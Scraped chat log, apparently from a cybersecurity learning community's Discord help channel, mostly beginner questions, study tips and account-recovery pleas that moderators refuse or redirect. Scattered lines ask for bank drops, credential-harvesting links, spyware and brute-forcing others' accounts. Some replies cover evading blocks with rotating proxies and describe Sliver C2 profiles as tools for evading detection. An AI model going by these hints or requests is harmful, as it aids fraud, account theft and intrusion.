fingers crossed it’s not too cursed when it shows up 😂

tidal orbit
wild onyx
#

yall know how to cash out a prepaid virtual visa got it as a gift fr but i rather it be in my bank account instead of spending it?

slow zodiac
#

Need a bank drop..link me if u got one

safe sierra
#

Hi

#

What app can I use that is similar to Kali Linux for Android phone?

left fable
#

Hello

clear cloud
#

At the end of it, it says yojzwpassive=true

#

I’m trying to log into my Google Chrome Gmail and it won’t load the page for my Gmail login

#

And in the HTTPs is a bunch of numbers and letters

#

Why won’t the Gmail load even though my Internet is good

halcyon flame
#

Doesn't sound like a valid login URL..

chilly merlin
#

try checking if u can access other sites

clear cloud
#

Exactly the URL is just scratchy

#

And it’s a lot of shit that shouldn’t be there

halcyon flame
#

You browsed direct to other sites? Did it just redirect you?

chilly merlin
#

phishing?

clear cloud
#

No, it just keeps loading loading

#

It’s on my MacBook

halcyon flame
#

On a hotspot, or what?

clear cloud
#

The other day I was looking at certain discords to join, and the link was on my Google so maybe me linking that could’ve been a bad thing

#

Hopefully, I didn’t make a bad mistake

chilly merlin
#

hmm

distant fox
#

Hey guys, I know this is a dumb question but what are some of things y’all use to study and memorize everything? I be taking hella notes but I get overwhelmed with everything.

clear cloud
#

The URL is not supposed to be that long and at the end, it says yo passive=true

halcyon flame
#

Can you share the URL, with some parts redacted (like the end of the hostname) in a codeblock? Sounds weird.. or want me to leave it to you Red 🙂

#

You said you can't reach other sites too, it just times out?

clear cloud
#

I need all the help I can get cause I feel bad. I was using my girlfriend’s MacBook. For Ethical Hacking research. I’m trying to learn as much as I can because my daughter is born. In a couple days.

#

She works for the federal government of Canada and this is the last thing she needs on her MacBook so if you guys have anything you can help me with I would appreciate it

#

I think I just got too deep into things on the computer without taking the right steps

halcyon flame
#

I mean, if Red doesn't mind, friend me so you can DM and I can take a look

#

No promises I can help, but curious.

clear cloud
#

She basically gave the computer to me but it has a lot of sensitive stuff on it in her life

#

All em you

empty badger
#

hey guys this is not really a cybersecurity based question but does anyone know a way how to unlock a disk write protection ive tried everything

lofty bough
#

hey i wanna do a prank on family is if possible to send a message from a different phone but when they receive message its like it was from my family member number

#

is this possible by any chance

halcyon flame
tame locust
#

Anyone can help me get my old ig account back

halcyon flame
clear cloud
#

Can anybody help?

#

I have a problem with a URL

#

And Wi-Fi connection - I unplugged my Wi-Fi - if anybody wants to DM me, I can give them more details on the situation.

spiral notch
#

Learn to ask questions

#

This doesn't explain anything in the slightest

austere heart
#

how to catch someone who hacked my facebook account

halcyon flame
flat bough
#

is there a way i can monitor game traffic?

chilly shadow
#

Please can anyone teach me hacking
It's my dream but I can't learn it
Sites that I've seen charge huge amount of money I can't afford

#

🙏🙏

loud river
#

I need help with studying challenges and solutions for conducting digital forensics in cloud environments and Exploring the impact of virtualization and containerization on forensic investigations.

halcyon flame
chilly shadow
dim stirrup
#

Tracking?

austere heart
potent jungle
#

on my mom life i need some new courses can someone tell me courses like i need videos

topaz ember
#

Hey, i need some help/guide
My friend's gmail got hacked by someone hacker changed pass, recovery mail and phone number, and add 2 factor auth
Is there any chance my friend can get there email back?
He has monetize YouTube channel on it

fading obsidian
#

Can anyone help me? 👋👋

I mistakenly deleted my two-step verification and now I can't access my Meta business account. Duo Security can't assist me, and neither can Meta Business, as they are two separate companies. I'm stuck in limbo and unable to get back into my account. I've been trying to recover it for almost two years and have even considered hiring a hacker for assistance. If anyone can help me regain access to my account, I would greatly appreciate it and would be willing to offer a reward. Thank you!

halcyon flame
#

No, no and no

#

Support is your only choice, anyone offering to help for payment will scam you.

devout hornet
#

Yea i try all of that , no luck

dusty knot
#

so i’m studying for my network plus cert i have a comp tia course a book and a set of online practice tests given to me by my school what is the best way to study and obtain knowledge

languid ridge
#

hello

weak sable
#

Whats a quick way of making money im flat broke

warm stratus
#

got a 403 issue in python

#

wondering how to get around it

verbal oxide
#

@weak sable business

maiden violet
warm stratus
#

it just randomly started to bypass

hearty heart
#

so i didnt have an invite i just clicked on from instagram

fleet nest
# warm stratus it just randomly started to bypass

if anything happens agian , try adding rotating proxies and Some servers issue CAPTCHAs if they detect unusual activity so could also try adding captcha handling 😊 " remember stay safe and ethical "

verbal oxide
#

How to check feather in rank ?

torpid shard
#

Can someone teach me how to set up your own SIEM lab! 😭😭😭🥲

maiden violet
#

Welcome to your one-stop guide for building a Free valuable Home SIEM Lab quickly and efficiently! This tutorial will help aspiring SOC analysts get practical experience without having the job yet.

Get Ahead in Your Cybersecurity Career: Practical experience is key in the cybersecurity field. This video provides you with actionable skills and ...

▶ Play video
fossil sky
#

Hello everyone,
New here
Any website to get a roadmap for cybersecurity?

void kiln
fossil sky
void kiln
# fossil sky Never thought about it that way. Thanks So, I want to be a forensic analyst

well for a starting point i would recommend tryhackme focusing on digital forensic rooms, from there i would setup a vm for both windows and linux and use different tools for forensic such as autopsy, volatility etc the more you research it to more you will find. hope this helps. i personally dont know any dedicated places for learning about digital forensic but maybe someone else does

fossil sky
lean quail
#

Hello I’m new here I needed help with something

#

How do I generate a link that when my staff login his email and password I can see them ?

forest plover
#

profiles in sliver c2, confuses me, do i really need it to make stagers ? what's the functions of profiles?

maiden violet
# forest plover profiles in sliver c2, confuses me, do i really need it to make stagers ? what's...

What Are Profiles in Sliver C2?

Profiles are configurations that define how your implants communicate with the Silver server.

Do You Really Need Profiles to Create Stagers?

Yes, you need a profile to create a stager in Silver because the profile specifies how your implants interact with the Silver server.

Functions of Profiles

  1. Stealth and Evasion: Profiles helps you imitate legit traffic patterns
  2. Flexible: let you switch between different communication methods
jade isle
#

Hello house , please net strong sites apart from chrome and Google

forest plover
forest plover
maiden violet
forest plover
brave cipher
#

Hey yall is the dell latitude 3340 good for coding

forest plover
glacial kestrel
#

Hey can someone guide me with siem and Microsoft suits for my soc interview?

faint vault
#

What's up guys I'm new here. So is there a way to make yourself ghostly on a security camera a guy passed my house the other day and I couldn't see by faint lines of the top half and but I could see he held something in his hand

honest mango
#

Helloow can someone give me an easy way of understanding boolean

#

The sop and pos

brave apex
#

Hello, I would like to ask, do you know how to access webs, that ends on .Taur, .Nept, dafy notes?

outer geyser
#

Working my way to become a ethical hacker what should I be learning first

verbal oxide
#

How to prevent from GIF attack

#

💀😑

#

@outer geyser build a foundation in networking and OS

blazing herald
#

For cyber security n stuff like hacking, testing etc
which os is the best?

turbid flume
blazing herald
#

ty

turbid flume
chilly merlin
#

👀

blazing herald
#

dual boot?

#

gonna look into that

#

thanks

turbid flume
blazing herald
#

ohh

#

it gives u options

#

i see

turbid flume
#

Whichever you have installed

blazing herald
#

ty

turbid flume
#

It gets a little bit complicated when you add windows to the equation (you need to have windows installed first)

turbid flume
#

I lowk don't know why

blazing herald
#

but it would still work w dual boot right?

turbid flume
#

I dual boot windows and arch linux

glass needle
#

Does anyone know which ip i have to use for the hook URL while using beef?

#

(http:IP:3000/hook.js is the URL ı am talking about)

shadow basin
#

Where can I start learning cyber security?

earnest tree
#

hello, is it normal to have the cpu at 25-35% when playing games?

chilly merlin
#

yes

#

thats a normal

spiral notch
sterile pagoda
#

ive got a question so how comes you can simply download kali on windows store but people decided to download this or that i understand that theres is all these diffrent ways to download kali but im just wondering why people use diffrent ways

#

pls @ so i can see

spiral notch
#

@sterile pagoda your question doesnt really make sense

sterile pagoda
#

mb i mean like people use kail on virtual machines and stuff and i was just asking like why do people use vm or download it a different way

crisp star
#

Also sometime you need to run 2 VMs.

#

When I analyze malware and I have to detonate it, I have a MITM proxy running.

sterile pagoda
#

I don’t know lots of ethical hacking or even cs but I was jsut asking like why bc I know you can download it on windows and on a vm and still swap between os and just wandering what’s the point in having different ways to download kali

jovial temple
#

hey does someone have a idea how i can reverse engineer a file ?

#

file type is file weird...

sharp pilot
#

Is it a binary file

#

?

jovial temple
#

all i can say is that when you open it in notepad it's like encoded minecraft enchented table type stuff

#

i provided the content of the file to chatgpt and told me it's encoded ?

#

?

sharp pilot
#

Give a screen shot

#

How it looks

jovial temple
#

i can't in this chanel

sharp pilot
#

Ohh yes sry

jovial temple
#

dms ?

sharp pilot
#

Maybe

pallid rampart
#

how can i get malware software for various things such as spying, taking control of a whole laptop or phone system, etc

cold ember
#

any one know how to use Havoc Framework over internet ??

chilly merlin
#

What's wrong with using Gmail? (I only care about the security part )

hallow yew
#

hey guys im new and want to start and i want to do it for my own safety but i never did som so i dont know what to do someon got tips for me how i can start and what i need?

hexed lily
#

Hey guys
I ran into a prblm
Whenever I set a spoofing attack my virtual machine just get disconnected from the router?
And every single time after the attack I have to create new VM
Why does old system gets disconnected?
Is it something with routers sec features? Or just some prblm with the ports

crisp star
hexed lily
#

My home router and 2 connected local device

spiral notch
#

Mac/arp spoofing mitm?

hexed lily
#

Yup

#

Arp mitm

fading dust
#

Anyone, If someone hacked my Instagram account, how can I regain access and control to it?

ionic totem
#

Especially considering you made your account today.

fading dust
tranquil ledge
#

Hi @everyone If you have a minute would you mind filling out this survey for my final year project at university. This survey is mainly targeted towards people who are experienced and/or have knowledge in detecting network related cyber attacks, so please only fill it out if you fit into that demographic. Thank you for your time, it really means a lot and is much appreciated😊 🫶

https://docs.google.com/forms/d/e/1FAIpQLSdDj3DqZ8l4uSzaiuSBflmFfA7BiWZASD7Iq-Q-MiGau0UpTw/viewform?usp=header

fast jacinth
velvet holly
#

Hi guys, can someone help me with decryption

#

im struggling to understand where its getting the extra letters from a 10 to 15 key

halcyon flame
#

Seriously @fading dust ... @fast jacinth

#

Actually thought your other query was "legitimate" as far as it could be said RE the device type.. but asking to "regaining" access to "your" account?

#

Fail

fading dust
# halcyon flame Actually thought your other query was "legitimate" as far as it could be said RE...

Bro, what's your deal? U been coming at me since I came onboard this platform. Let's be clear - I'm a trapper. Not a scammer nor computer wiz. I'm sitting in a prison cell but have my own and carry my own. If I can acquire services for issues involving me and mines from this platform then we'll pay for it. But quit coming at me like I'm on some shady business type time. I'm not on all of that. My brother got his account hacked today and if someone can get it back for him he'll pay them - simple‼️

halcyon flame
#

Because you just asked to hack in to an instagram account

#

Just.. call total bs

#

If anyone says they can hack it for you, they are going to scam you.

#

Good luck.

spiral notch
halcyon flame
#

Also sorry.. but if you are in fact in jail, asking how to root a device you're fortunate enough to have access to, or asking how to hack an instagram account.. that's a perfect way to get those privileges taken away. You're away for a reason, and still are trying to do other things that are illegal or questionable? Dude, learn a lesson

olive laurel
halcyon flame
#

Because some people don't care about others, and are just out to exploit others for money

#

That's how those "I hack for you" scams work.. they sell hope, and exploit desperation

halcyon flame
#

I guess.. but it's not anything new

olive laurel
halcyon flame
#

Scam artists have been a thing for a while

#

like.. a long while

#

For those kind of people, any kind of desperation or desire to do something outside of law is an opportunity to pull money out of others by scamming on a promise.

#

Ultimately.. if your account was hacked, your only real option is to contact the services support.

fading dust
# halcyon flame If anyone says they can hack it for you, they are going to scam you.

I'm far from green my guy. Quite a few just told me they can regain control of the account but all wants upfront payment. When I literally offered w payment to each if get the job done then send a msg to me from my brother's account. But none agreed. Each spoke on payment. One thing I have done in prison is "educate" myself. Under my belt is a paralegal degree and psychology. One thing I learned in psychology is the way specific classes of individuals mind operate. Specifically hackers enjoy the glory of the challenge vs upfront payment.

halcyon flame
#

Ok, well.. anyone that says they can help you for cost up front, they will scam you

#

Good stuff about education while away. Just saying.. asking the things you are while away, not the best of ideas

covert siren
#

I've completed my Ethical Hacking course!! What should I do next?

fading dust
halcyon flame
#

Great.. now I have one of the songs from the animated Robinhood film in my head, the one with Friar Tuck..

halcyon flame
#

So yeah, sorry. I'll shut up

covert siren
#

I've completed my Ethical Hacking course!! What should I do next? @halcyon flame

halcyon flame
#

Try out platforms, find what works best for you

fading dust
#

My days of doin' wrong to ppl ended 21 yrs ago. I earn everything I have and take care of me. If I can do for ppl I do it without expectations of something in return. I learned through extensive study the rules and levels of karma. So I move in a way of righteousness. I refrain from impure thoughts as well as behaviors and treated everyone the way I want to be treated. At the end of the day, I'm surviving the way I learned to.

valid belfry
#

Who needs help tonight

velvet leaf
#

Blessings everyone, I’m here to learn, network and connect with honorable members (NO NONSENSE TOLERATED)with that said. Im honored and willing.

odd lance
#

3dac93b8cd250aa8c1a36fffc79a17a

does Does Anyone know what type of encryption that is?

#

nvm i am stupid its md5 missing an extra char

opal ridge
#

lol

odd lance
#

it was 31 and i was like wait md5 is 32 and was dead confused

opal ridge
#

Yeah it was telling Hexidecimal

odd lance
#

yeah i guess i have to brute force the last possible alpha num combination

pallid rampart
#

this guy is a scammer beware of @tiny star

valid belfry
#

wow i was right

frail jacinth
#

i know this is off topic but i actually need some help of how to ssh ubuntu server (from virtualbox) to windows terminal, i have installed openssh-client (for windows terminal) and openssh-server (for ubuntu server in vm) and i got the ip address and still i got the permissions denied,like i have been configured these stuff more than 1 hour and there's no luck, i tried the method from chatgpt yet no luck also. Anyway, i appreciate any kind of help from yall, im desperate since it is one of my project.

chilly merlin
#

@silent hemlock Just a friendly reminder that discussions or actions related to unethical activities, including unauthorized hacking or similar behavior, are not permitted in this space. We appreciate your cooperation in fostering a positive and ethical community.
We’d like to remind you that OwlSec upholds the highest standards of ethics and integrity in all discussions and activities. Engaging in or condoning vigilantism, unauthorized hacking, or any form of unethical behavior, such as seeking revenge on scammers, is strictly prohibited.

chilly merlin
#

if its yours why dont u have access?

silent hemlock
#

I don't wanna know them

#

i want to discorver them

chilly merlin
silent hemlock
#

like trying to get them with bruteforce

#

i'm a beginner i just try things

#

lol

chilly merlin
#

check yt and Ai

#

this server wont help kindly

#

pls refrain

silent hemlock
#

Alright thanks tho, do you want i del the message ?

chilly merlin
#

that is unethical and un authorized

wooden wave
#

Hey I'm from India then why youtube shows translate to Chinese that one comment on video

severe cloak
#

Best tutorial to install python and visual studio with Linux?

somber halo
#

hey guyz, some one know how to craft a get/post request into an image?

spiral notch
#

also ur whitehat

#

shouldnt need this info so early on

#

also no - not possible

somber halo
#

it's only for knowing, if i want to be the best i need to know as much as possible.

#

not everyone use the capacibility and the knowledge for made bad action...

spiral notch
#

If you need any help learning the basics feel free to dm me

spiral notch
languid copper
#

Does anyone know how to locate an ip address??

minor blade
spiral notch
lime glen
#

Can you learn me hacking please 🥺

pulsar finch
pure stream
#

how ca i unlock my apple id its lock and i cant reset it urgent help plss

worldly nebula
#

Can any one help with a problem I’m having with hydra on Kali Linux

night tide
#

yo, can anyone help me with how to setup MOK manager on kali?

#

i tried so hard and it's still not working

spiral notch
#

If u don't want that happening to u, learn opsec

#

I can teach u a bit

proud pecan
#

What do I do against the salt typhoon hackers?

#

To prevent them from hacking

spiral notch
proud pecan
#

Search it up

chilly eagle
proud pecan
#

I just don’t wanna get hacked why tf would they go after me

#

They hackers bruh they got free will☠️

#

N I’m paranoid as shit

chilly eagle
#

out of 8 billion+ peeps they wont particularly target you

proud pecan
#

Bro they already did it too 1 million people who knows of I’m next when being online

#

I just wanna be secure

chilly eagle
#

We’re the Electronic Frontier Foundation, an independent non-profit working to protect online privacy for over thirty years. This is Surveillance Self-Defense: our expert guide to protecting you and your friends from online spying.

Read the BASICS to find out how online surveillance works. Dive into our TOOL GUIDES for instructions...

proud pecan
#

Thank you man

#

I appreciate that

chilly eagle
#

these are basics tho

proud pecan
worldly nebula
#

can someone help me with a problem on hydra?

spiral notch
trim sparrow
#

Hi, is HTB Bug bounty job role enough to get good in bug bounty? or does anyone recommend another thing

odd lance
#

good enough to get low level bugs but you might need to do more research

worldly nebula
#

when i try to brute force it fails with this message: all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found

odd lance
#

dont expect to start getting bugs that easy might take a while just keep focusing on the owasp vulns and try exploiting them

true briar
#

hey guys do someone know how to hack with a ipad ?

odd lance
#

are u trying to crack a list

#

if not use hydra

worldly nebula
odd lance
#

lost me at that never done that so i have no clue

#

u cant even brute force a gmail account

worldly nebula
#

then how can i crack one? mine btw it was hacked and im trying to get it back

odd lance
#

i doubt even if the traffic is going through

#

gmail should have flagged it

#

thats why u have connection error

worldly nebula
#

how do i contact a real person there ?

#

not via number, live chat or smth

ionic rover
#

Hey guys it’s my first time in this. Am I in the correct place to start cybersecurity?

spiral notch
#

if u have any questions feel free to dm me

ionic rover
#

Thank you

unreal heart
#

can anyone help me

sick leaf
#

I setup a VM w/ kali linux, but some commands or installations don't go through, or if I nmap scan, nothing shows up. Is it because it's in a VM. If so, what would you recommend to set up an active directory hacking lab (ethical).

spiral notch
unreal heart
#

i try to put the command in from tryhackme(gobuster) and it’s saying the command is not working

bleak walrus
#

I wanna make a forum for helping ppl repair stuff,but I don't have a physical server and my test bench doesn't have a hard drive,I wanna make everything on The cloud instead of physical server

unreal heart
bleak walrus
#

That's the thing

#

I can't find one that's free

#

And Im not paying for one

spiral notch
#

theres a lot of free ones

#

what backend u using?

#

@bleak walrus

bleak walrus
#

Idk yet

#

I'm studying

#

For this

spiral notch
#

then learn a backend lang

#

before worrying about a server

bleak walrus
#

ai 🤑

spiral notch
#

ni

#

no

bleak walrus
#

Wdym no

#

Wdym

#

I use ai till I can do them myself

sick leaf
#

I setup a VM w/ kali linux, but some commands or installations don't go through, or if I nmap scan, nothing shows up. Is it because it's in a VM. If so, what would you recommend to set up an active directory hacking lab (ethical).

#

Are there limits that Kali Linux has in a VMware Fusion?

chilly merlin
#

I just got a message from a +63 number, they sent a phishing link and I remember seeing someone resend the link that was similar but it was a logger, Im not sure how to do it and I cant find the video. I do a lot of investigating whenever I get a first and last name or a phone number but Im new to logging

#

@maiden violet @civic wind Needs help with setting up a windows 11 duel boot. Is this something you could help with?

bleak walrus
#

which thing r u tryna dualboot?

#

11 and what else?

#

@chilly merlin .

chilly merlin
bleak walrus
#

a

chilly merlin
#

Idk how to do that personally XD

bleak walrus
#

im dualbooting mint and 10

spiral notch
bleak walrus
#

ik how to

chilly merlin
spiral notch
#

11 sux

chilly merlin
spiral notch
#

Proud w10 user

bleak walrus
#

10 is the goat proov me wrong bru

chilly merlin
#

ok ok I understand 🤣

spiral notch
#

Well

#

More proud arch user

bleak walrus
#

i use mint btw

spiral notch
#

stop with the skulls

bleak walrus
#

arch is full customizationg

bleak walrus
#

bomboclaat

spring sand
#

what is the best terminal for windows?

unreal heart
#

is there a reason why my wordlist is not working in gobuster

bleak walrus
#

anyone knows about massgravel windows activation thingy

wanton cradle
spiral notch
#

Command prompt

#

Powershell

wanton cradle
#

Can I get help please

spiral notch
wanton cradle
#

You guys can hack into everything right or check if something is legit or not

spiral notch
wanton cradle
#

Well understood,though I thought maybe you can check for me my mining account if it's legit or not because the sever had so many threads to became a fake one

spiral notch
#

Wdym ur mining account?

spring sand
wanton cradle
#

Can I send a link an you check it out for me

spiral notch
spiral notch
spring sand
spiral notch
#

What am I exactly trying to find here again?

odd lance
#

if u think thats a legit site its not

halcyon flame
#

lol

foggy ermine
#

can someone help me root my phone